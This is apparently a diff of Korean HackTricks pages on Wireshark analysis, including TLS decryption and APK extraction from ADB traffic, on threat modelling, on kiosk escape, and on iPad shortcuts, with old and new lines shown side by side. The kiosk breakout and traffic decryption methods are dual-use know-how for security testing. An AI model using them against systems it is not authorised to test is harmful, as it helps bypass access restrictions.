**I/O 그래프**
_**Statistics --> I/O Graph**_에서 통신의 **그래프**를 찾을 수 있습니다.
_**Statistics --> I/O Graph**_ 아래에서 통신의 **그래프**를 찾을 수 있습니다.
![](<../../../.gitbook/assets/image (574).png>)
![](<../../../.gitbook/assets/image (989).png>)
### 필터
다음은 프로토콜에 따른 wireshark 필터를 찾을 수 있는 곳입니다: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
여기서 프로토콜에 따라 wireshark 필터를 찾을 수 있습니다: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
다른 흥미로운 필터:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
* HTTP 및 초기 HTTPS 트래픽
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
* HTTP 및 초기 HTTPS 트래픽 + TCP SYN
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* HTTP 및 초기 HTTPS 트래픽 + TCP SYN + DNS 요청
- `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
- HTTP 및 초기 HTTPS 트래픽
- `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
- HTTP 및 초기 HTTPS 트래픽 + TCP SYN
- `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
- HTTP 및 초기 HTTPS 트래픽 + TCP SYN + DNS 요청
### 검색
세션의 패킷 내용을 **검색**하려면 _CTRL+f_를 누르세요. 오른쪽 버튼을 누르고 편집 열을 눌러 주요 정보 막대에 새로운 레이어를 추가할 수 있습니다 (No., Time, Source 등).
세션의 **패킷** 내용을 **검색**하려면 _CTRL+f_를 누르세요. 오른쪽 버튼을 누르고 열 편집을 눌러 주요 정보 표시줄에 새 레이어를 추가할 수 있습니다(번호, 시간, 출처 등).
### 무료 pcap 랩
**[https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**의 무료 도전 과제로 연습하세요.
**무료 도전 과제로 연습하세요:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net)
## 도메인 식별
Host HTTP 헤더를 표시하는 열을 추가할 수 있습니다:
![](<../../../.gitbook/assets/image (403).png>)
![](<../../../.gitbook/assets/image (635).png>)
그리고 시작하는 HTTPS 연결에서 서버 이름을 추가하는 열을 추가할 수 있습니다 (**ssl.handshake.type == 1**):
발신 HTTPS 연결에서 서버 이름을 추가하는 열을 추가할 수 있습니다 (**ssl.handshake.type == 1**):
![](<../../../.gitbook/assets/image (408) (1).png>)
@ -107,39 +119,38 @@ Host HTTP 헤더를 표시하는 열을 추가할 수 있습니다:
현재 Wireshark에서는 `bootp` 대신 `DHCP`를 검색해야 합니다.
![](<../../../.gitbook/assets/image (404).png>)
![](<../../../.gitbook/assets/image (1010).png>)
### NBNS에서
![](<../../../.gitbook/assets/image (405).png>)
![](<../../../.gitbook/assets/image (1000).png>)
## TLS 해독
### 서버 개인 키로 https 트래픽 해독
_edit>preference>protocol>ssl>_
_편집>환경설정>프로토콜>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
![](<../../../.gitbook/assets/image (1100).png>)
_Edit_를 누르고 서버와 개인 키의 모든 데이터 (_IP, Port, Protocol, Key file and password_)를 추가하세요.
_편집_을 누르고 서버 및 개인 키의 모든 데이터를 추가하세요(_IP, 포트, 프로토콜, 키 파일 및 암호_)
### 대칭 세션 키로 https 트래픽 해독
Firefox와 Chrome은 TLS 세션 키를 기록하는 기능을 갖추고 있으며, 이를 Wireshark와 함께 사용하여 TLS 트래픽을 해독할 수 있습니다. 이를 통해 안전한 통신의 깊은 분석이 가능합니다. 이 해독을 수행하는 방법에 대한 자세한 내용은 [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)의 가이드에서 찾을 수 있습니다.
Firefox와 Chrome은 TLS 세션 키를 기록할 수 있는 능력이 있으며, 이는 Wireshark와 함께 사용하여 TLS 트래픽을 해독하는 데 사용될 수 있습니다. 이를 통해 안전한 통신의 심층 분석이 가능해집니다. 이 해독을 수행하는 방법에 대한 자세한 내용은 [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)의 가이드에서 찾을 수 있습니다.
이를 감지하려면 환경에서 `SSLKEYLOGFILE` 변수를 검색하세요.
이를 감지하려면 환경에서 `SSLKEYLOGFILE` 변수를 검색하세요
공유 키 파일은 다음과 같이 보일 것입니다:
![](<../../../.gitbook/assets/image (99).png>)
![](<../../../.gitbook/assets/image (817).png>)
Wireshark에서 이를 가져오려면 \_edit > preference > protocol > ssl >로 이동하여 (Pre)-Master-Secret log filename에 가져옵니다:
![](<../../../.gitbook/assets/image (100).png>)
Wireshark에 이를 가져오려면 \_편집 > 환경설정 > 프로토콜 > ssl >로 이동하여 (Pre)-Master-Secret 로그 파일 이름에 가져옵니다:
![](<../../../.gitbook/assets/image (986).png>)
## ADB 통신
APK가 전송된 ADB 통신에서 APK를 추출하세요.
APK가 전송된 ADB 통신에서 APK를 추출하세요:
```python
from scapy.all import *
@ -166,16 +177,29 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 제로부터 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **Hacking 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
* **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)**이나 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -1,12 +1,12 @@
# 위협 모델링
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 랜섬웨어 공격에 대항하는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 랜섬웨어 공격에 대항하는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
@ -16,35 +16,35 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
## 위협 모델링
위협 모델링에 대한 HackTricks의 포괄적인 가이드에 오신 것을 환영합니다! 이 사이버 보안의 중요한 측면인 위협 모델링을 식별하고 이해하며 시스템의 잠재적 취약에 대응하는 전략을 탐색해 보세요. 이 가이드는 현실 세계의 예제, 유용한 소프트웨어 및 쉽게 이해할 수 있는 설명으로 가득한 단계별 가이드 역할을 합니다. 초보자와 경험 있는 실무자 모두에게 이상적이며 사이버 보안 방어를 강화하려는 들에게 유용합니다.
위협 모델링에 대한 HackTricks의 포괄적인 가이드에 오신 것을 환영합니다! 이 사이버 보안의 중요한 측면인 위협 모델링을 식별하고 이해하며 시스템의 잠재적 취약에 대응하는 전략을 탐색해 보세요. 이 가이드는 현실 세계의 예제, 유용한 소프트웨어 및 쉽게 이해할 수 있는 설명으로 가득한 단계별 가이드 역할을 합니다. 초보자와 경험 있는 실무자 모두에게 이상적이며 사이버 보안 방어를 강화하려는 사람들에게 유용합니다.
### 일반적으로 사용되는 시나리오
1. **소프트웨어 개발**: 안전한 소프트웨어 개발 수명 주기(SSDLC)의 일환으로, 위협 모델링은 개발 초기 단계에서의 **잠재적 취약 원천 식별**에 도움을 줍니다.
2. **펜트esting**: 펜트esting 실행 표준(PTES) 프레임워크는 **시스템의 취약점을 이해하기 위한 위협 모델링**을 요구합니다.
1. **소프트웨어 개발**: 안전한 소프트웨어 개발 수명 주기(SSDLC)의 일환으로, 위협 모델링은 개발 초기 단계에서의 **잠재적 취약 원천 식별**에 도움을 줍니다.
2. **펜트esting**: 펜트esting 실행 표준(PTES) 프레임워크는 **시스템의 취약성을 이해하기 위한 위협 모델링**을 필요로 합니다.
### 요약된 위협 모델
위협 모델은 일반적으로 응용 프로그램의 계획된 아키텍처 또는 기존 빌드를 나타내는 다이어그램, 이미지 또는 다른 시각적 표현으로 나타냅니다. 이는 **데이터 흐름 다이어그램**과 유사하지만, 보안 중심적 설계에서의 주요 차이점이 있습니다.
위협 모델은 일반적으로 응용 프로그램의 계획된 아키텍처 또는 기존 빌드를 나타내는 다이어그램, 이미지 또는 다른 시각적 표현으로 나타냅니다. 이는 **데이터 흐름 다이어그램**과 유사하지만, 주요 차이점은 보안 중심적 설계에 있습니다.
위협 모델에는 종종 잠재적 취약점, 위험 또는 장벽을 상징하는 빨간색으로 표시된 요소가 포함됩니다. 위험 식별 프로세스를 간소화하기 위해 CIA(기밀성, 무결성, 가용성) 삼합체가 사용되며, STRIDE가 가장 일반적인 방법 중 하나입니다. 그러나 선택한 방법론은 구체적인 맥락과 요구 사항에 따라 다를 수 있습니다.
위협 모델에는 종종 잠재적인 취약성, 위험 또는 장벽을 상징하는 빨간색으로 표시된 요소가 포함됩니다. 위험 식별 프로세스를 간소화하기 위해 CIA(기밀성, 무결성, 가용성) 삼합체가 사용되며, STRIDE가 가장 일반적인 방법 중 하나입니다. 그러나 선택한 방법론은 구체적인 맥락과 요구 사항에 따라 다를 수 있습니다.
### CIA 삼합체
CIA 삼합체는 정보 보안 분야에서 널리 인정받는 모델로, 기밀성, 무결성 및 가용성을 나타냅니다. 이 세 가지 요소는 많은 보안 조치 및 정책 기초를 형성하며, 위협 모델링 방법론을 포함합니다.
CIA 삼합체는 정보 보안 분야에서 널리 인정받는 모델로, 기밀성, 무결성 및 가용성을 나타냅니다. 이 세 가지 요소는 많은 보안 조치 및 정책이 구축되는 기초를 형성하며, 위협 모델링 방법론을 포함합니다.
1. **기밀성**: 데이터나 시스템이 무단으로 접근되지 않도록 보장합니다. 이는 적절한 접근 제어, 암호화 및 기타 조치를 필요로 하며 데이터 유출을 방지합니다.
1. **기밀성**: 데이터나 시스템이 무단으로 접근되지 않도록 보장합니다. 이는 적절한 액세스 제어, 암호화 및 기타 조치를 필요로 하며, 데이터 침해를 방지하기 위한 조치가 필요합니다.
2. **무결성**: 데이터의 정확성, 일관성 및 신뢰성을 보장합니다. 이 원칙은 데이터가 무단으로 변경되거나 조작되지 않도록 보장합니다. 이는 체크섬, 해싱 및 기타 데이터 확인 방법을 포함합니다.
3. **가용성**: 데이터와 서비스가 필요할 때 허가된 사용자에게 접근 가능하도록 보장합니다. 시스템이 중단되더라도 시스템이 계속 작동하도록 하기 위해 중복, 장애 허용 및 고가용성 구성이 필요합니다.
3. **가용성**: 데이터와 서비스가 필요할 때 허가된 사용자에게 접근 가능하도록 보장합니다. 시스템이 중단되더라도 시스템이 계속 작동하도록 하기 위해 여분, 장애 허용 및 고가용성 구성이 필요합니다.
### 위협 모델링 방법론
1. **STRIDE**: Microsoft에서 개발된 STRIDE는 **위조, 변조, 부인, 정보 노출, 서비스 거부 및 권한 상승**을 나타내는 약어입니다. 각 범주는 위협 유형을 나타내며, 이 방법론은 잠재적 위협을 식별하기 위해 프로그램이나 시스템의 설계 단계에서 일반적으로 사용됩니다.
2. **DREAD**: Microsoft의 또 다른 방법론으로 식별된 위협의 위험 평가에 사용됩니다. DREAD는 **피해 가능성, 재현성, 이용 가능성, 영향을 받는 사용자 및 발견 가능성**을 나타냅니다. 각 요소는 점수가 매겨지며, 결과는 식별된 위협을 우선 순위로 정하는 데 사용됩니다.
3. **PASTA**(공격 시뮬레이션 및 위협 분석 프로세스): 이는 일곱 단계의 **위험 중심** 방법론입니다. 보안 목표를 정의하고 식별, 기술 범위 생성, 응용 프로그램 분해, 위협 분석, 취약 분석 및 위험/트리지 평가를 포함합니다.
4. **Trike**: 자산을 방어하는 데 초점을 맞춘 위험 중심 방법론입니다. **위험 관리** 관점에서 시작하여 해당 맥락과 요구 사항을 고려합니다.
3. **PASTA**(공격 시뮬레이션 및 위협 분석 프로세스): 이는 일곱 단계의 **위험 중심** 방법론입니다. 보안 목표를 정의하고 식별, 기술 범위 생성, 응용 프로그램 분해, 위협 분석, 취약 분석 및 위험/트리지 평가를 포함합니다.
4. **Trike**: 자산을 방어하는 데 초점을 맞춘 위험 중심 방법론입니다. 위험 관리 관점에서 시작하여 해당 맥락과 요구 사항에 따라 위협과 취약성을 살펴봅니다.
5. **VAST**(시각적, 민첩 및 간단한 위협 모델링): 이 방법론은 Agile 개발 환경에 통합되도록 설계되었습니다. 다른 방법론의 요소를 결합하고 **위협의 시각적 표현**에 초점을 둡니다.
6. **OCTAVE**(운영 중요 위협, 자산 및 취약 평가): CERT Coordination Center에서 개발된 이 프레임워크는 **특정 시스템이나 소프트웨어가 아닌 조직적 위험 평가**를 위해 고안되었습니다.
6. **OCTAVE**(운영 중요 위협, 자산 및 취약 평가): CERT Coordination Center에서 개발된 이 프레임워크는 **특정 시스템이나 소프트웨어가 아닌 조직적 위험 평가**를 위해 고안되었습니다.
## 도구
@ -54,7 +54,7 @@ CIA 삼합체는 정보 보안 분야에서 널리 인정받는 모델로, 기
사이버 보안 전문가를 위한 고급 크로스 플랫폼 및 다기능 GUI 웹 스파이더/크롤러인 Spider Suite를 사용하여 공격 표면 매핑 및 분석이 가능합니다.
**사용법**
**사용법**
1. URL 선택 및 크롤링
@ -68,7 +68,7 @@ CIA 삼합체는 정보 보안 분야에서 널리 인정받는 모델로, 기
OWASP의 오픈 소스 프로젝트인 Threat Dragon은 시스템 다이어그램 및 위협/완화를 자동으로 생성하는 규칙 엔진을 포함한 웹 및 데스크톱 애플리케이션입니다.
**사용법**
**사용법**
1. 새 프로젝트 생성
@ -96,7 +96,7 @@ SpiderSuite 크롤러와 같은 도구를 사용하여 영감을 받을 수 있
* 프로세스(웹 서버 또는 웹 기능과 같은 엔티티 자체)
* 액터(웹사이트 방문자, 사용자 또는 관리자와 같은 사람)
* 데이터 흐름 라인(상호 작용 표시)
* 데이터 흐름 라인(상호 작용 표시)
* 신뢰 경계(다른 네트워크 세그먼트 또는 범위)
* 저장소(데이터가 저장되는 곳인 데이터베이스와 같은 것)
@ -124,11 +124,11 @@ SpiderSuite 크롤러와 같은 도구를 사용하여 영감을 받을 수 있
이것은 Microsoft의 무료 도구로, 소프트웨어 프로젝트의 설계 단계에서 위협을 찾는 데 도움을 줍니다. 이 도구는 STRIDE 방법론을 사용하며 Microsoft의 스택에서 개발하는 사람들에게 특히 적합합니다.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io) **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.

View file

@ -1,26 +1,26 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **HackTricks를 PDF로 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **해킹 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소로 PR을 제출하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
그들의 웹사이트를 방문하고 무료로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -39,7 +39,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
다음을 확인해야 합니다:
* 파일 수정 또는 생성
* 파일 수정 또는 새 파일 생성
* 심볼릭 링크 생성
* 제한된 영역에 액세스
* 다른 앱 실행
@ -54,7 +54,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
### \*NIX __
_bash, sh, zsh..._ 더 많은 정보는 여기에서 확인할 수 있습니다: [https://gtfobins.github.io/](https://gtfobins.github.io)
_bash, sh, zsh..._ 여기에서 더 많은 것을 찾을 수 있습니다: [https://gtfobins.github.io/](https://gtfobins.github.io)
# Windows
@ -127,14 +127,14 @@ _bash, sh, zsh..._ 더 많은 정보는 여기에서 확인할 수 있습니다:
* 왼쪽에서 오른쪽으로 스와이프하여 모든 열린 창을 볼 수 있으며 KIOSK 앱을 최소화하고 전체 OS에 직접 액세스할 수 있습니다.
* 오른쪽에서 왼쪽으로 스와이프하여 작업 센터를 열고 KIOSK 앱을 최소화하고 전체 OS에 직접 액세스할 수 있습니다.
* 위쪽 가장자리에서 스와이프하여 전체 화면 모드로 열린 앱의 타이틀 바를 표시할 수 있습니다.
* 아래쪽에서 위쪽으로 스와이프하여 전체 화면 앱에서 작업 표시줄을 표시할 수 있습니다.
* 위쪽 가장자리에서 스와이프하여 전체 화면 모드로 열린 앱의 타이틀 바를 표시니다.
* 아래쪽에서 위쪽으로 스와이프하여 전체 화면 앱에서 작업 표시줄을 표시니다.
## 인터넷 익스플로러 트릭
## 인터넷 익스플로러
### '이미지 툴바'
클릭하면 이미지 상단 왼쪽에 나타나는 툴바입니다. 저장, 인쇄, 메일 보내기, 탐색기에서 "내 사진" 열기 등이 가능합니다. Kiosk는 인터넷 익스플로러를 사용해야 합니다.
클릭하면 이미지 상단 왼쪽에 나타나는 툴바입니다. 저장, 인쇄, 메일 보내기, 탐색기에서 "내 사진" 열기 등이 가능합니다. 키오스크는 인터넷 익스플로러를 사용해야 합니다.
### 쉘 프로토콜
@ -181,16 +181,16 @@ JavaScript를 사용하여 공통 대화 상자를 만들고 파일 탐색기에
## 제스처 및 버튼
* 네 손가락으로 위로 스와이프 / 홈 버튼을 두 번 탭: 멀티태스크 보기 및 앱 변경
* 네 손가락으로 한쪽으로 스와이프: 다음/이전 앱으로 변경
* 다섯 손가락으로 화면을 집어넣기 / 홈 버튼을 터치 / 화면 아래쪽에서 위쪽으로 빠르게 스와이프하여 위로 이동: 홈에 액세스
* 화면 아래쪽에서 손가락으로 1-2인치 위로 느리게 스와이프: 독이 나타납니다.
* 화면 상단에서 손가락으로 아래로 스와이프: 알림 보기
* 화면 오른쪽 상단에서 손가락으로 아래로 스와이프: iPad Pro의 제어 센터 보기
* 화면 왼쪽에서 손가락으로 1-2인치 스와이프: 오늘 보기 보기
* 화면 중앙에서 빠르게 오른쪽이나 왼쪽으로 손가락으로 스와이프: 다음/이전 앱으로 변경
* 네 손가락 또는 다섯 손가락으로 한쪽으로 스와이프: 다음/이전 앱으로 변경
* 다섯 손가락으로 화면을 집어넣거나 홈 버튼을 터치하거나 화면 하단에서 위쪽으로 빠르게 스와이프: 홈에 액세스
* 한 손가락으로 화면 하단에서 1-2인치 위로 느리게 스와이프: 독이 나타납니다.
* 한 손가락으로 화면 상단에서 아래로 스와이프: 알림 보기
* 한 손가락으로 화면 오른쪽 상단에서 아래로 스와이프: iPad Pro의 제어 센터 보기
* 화면 왼쪽에서 손가락으로 1-2인치 스와이프: 오늘 보기 보기
* 화면 중앙에서 빠르게 오른쪽이나 왼쪽으로 손가락으로 스와이프: 다음/이전 앱으로 변경
* iPad 오른쪽 상단의 전원/잠금/취침 버튼을 누르고 오른쪽으로 슬라이드하여 전원을 끕니다: 전원 끄기
* iPad 오른쪽 상단의 전원/잠금/취침 버튼을 누르고 홈 버튼을 몇 초 동안 누릅니다: 강제 전원 끄기
* iPad 오른쪽 상단의 전원/잠금/취침 버튼을 누르고 홈 버튼을 빠르게 누릅니다: 화면 하단 왼쪽에 팝업되는 스크린샷을 찍습니다. 두 버튼을 동시에 매우 짧게 누르면 몇 초 동안 누르는 것처럼 강제 전원이 꺼집니다.
* iPad 오른쪽 상단의 전원/잠금/취침 버튼을 누르고 홈 버튼을 몇 초 동안 누릅니다: 강제 종료
* iPad 오른쪽 상단의 전원/잠금/취침 버튼을 누르고 홈 버튼을 빠르게 누릅니다: 화면 하단 왼쪽에 팝업되는 스크린샷을 찍습니다. 두 버튼을 동시에 매우 짧게 누르면 몇 초 동안 강제 종료됩니다.
## 바로 가기
@ -214,15 +214,15 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
이 바로 가기는 iPad의 시각적 설정 및 소리 설정에 따라 다릅니다.
| 바로 가기 | 동작 |
| -------- | ----------------- |
| F1 | 화면 어둡게 하기 |
| F2 | 화면 밝게 하기 |
| F7 | 이전 곡으로 이동 |
| F8 | 재생/일시정지 |
| F9 | 다음 곡으로 이동 |
| -------- | ------------------ |
| F1 | 화면 어둡게 하기 |
| F2 | 화면 밝게 하기 |
| F7 | 이전 곡으로 돌아가기 |
| F8 | 재생/일시정지 |
| F9 | 다음 곡으로 건너뛰기 |
| F10 | 음소거 |
| F11 | 볼륨 감소 |
| F12 | 볼륨 증가 |
| F11 | 볼륨 낮추기 |
| F12 | 볼륨 높이기 |
| ⌘ Space | 사용 가능한 언어 목록 표시; 선택하려면 다시 스페이스 바를 탭합니다. |
### iPad 탐색
@ -241,7 +241,7 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
| ^⌥H (Control-Option-H) | 홈 버튼 |
| ^⌥H H (Control-Option-H-H) | 멀티태스크 바 표시 |
| ^⌥I (Control-Option-i) | 항목 선택기 |
| Escape | 뒤로 가기 |
| Escape | 뒤로 버튼 |
| → (오른쪽 화살표) | 다음 항목 |
| ← (왼쪽 화살표) | 이전 항목 |
| ↑↓ (위 화살표, 아래 화살표) | 선택한 항목을 동시에 탭하기 |
@ -251,7 +251,7 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
| ^⌥S (Control-Option-S) | VoiceOver 음성 켜기/끄기 |
| ⌘⇧⇥ (Command-Shift-Tab) | 이전 앱으로 전환 |
| ⌘⇥ (Command-Tab) | 원래 앱으로 전환 |
| ←+→, 그런 다음 Option + ← 또는 Option+→ | 독을 통해 탐색 |
| ←+→, 그리고 Option + ← 또는 Option+→ | 독을 통해 탐색 |
### Safari 단축키
| 단축키 | 동작 |
@ -259,26 +259,26 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
| ⌘L (Command-L) | 위치 열기 |
| ⌘T | 새 탭 열기 |
| ⌘W | 현재 탭 닫기 |
| ⌘R | 현재 탭 새로고침 |
| ⌘R | 현재 탭 새로 고침 |
| ⌘. | 현재 탭 로딩 중지 |
| ^⇥ | 다음 탭으로 전환 |
| ^⇧⇥ (Control-Shift-Tab) | 이전 탭으로 이동 |
| ⌘L | 텍스트 입력/URL 필드 선택하여 수정하기 |
| ⌘L | 텍스트 입력/URL 필드 선택하여 수정 |
| ⌘⇧T (Command-Shift-T) | 마지막으로 닫은 탭 열기 (여러 번 사용 가능) |
| ⌘\[ | 브라우징 기록에서 이전 페이지로 이동 |
| ⌘] | 브라우징 기록에서 다음 페이지로 이동 |
| ⌘\[ | 브라우징 기록에서 이전 페이지로 이동 |
| ⌘] | 브라우징 기록에서 다음 페이지로 이동 |
| ⌘⇧R | 리더 모드 활성화 |
### 메일 단축키
| 단축키 | 동작 |
| -------------------------- | ---------------------------- |
| ⌘L | 위치 열기 |
| ⌘T | 새 탭 열기 |
| ⌘L | 위치 열기 |
| ⌘T | 새 탭 열기 |
| ⌘W | 현재 탭 닫기 |
| ⌘R | 현재 탭 새로고침 |
| ⌘. | 현재 탭 로딩 중지 |
| ⌘⌥F (Command-Option/Alt-F) | 메일함에서 검색 |
| ⌘R | 현재 탭 새로 고침 |
| ⌘. | 현재 탭 로딩 중지 |
| ⌘⌥F (Command-Option/Alt-F) | 메일함에서 검색 |
# 참고 자료
@ -288,15 +288,15 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
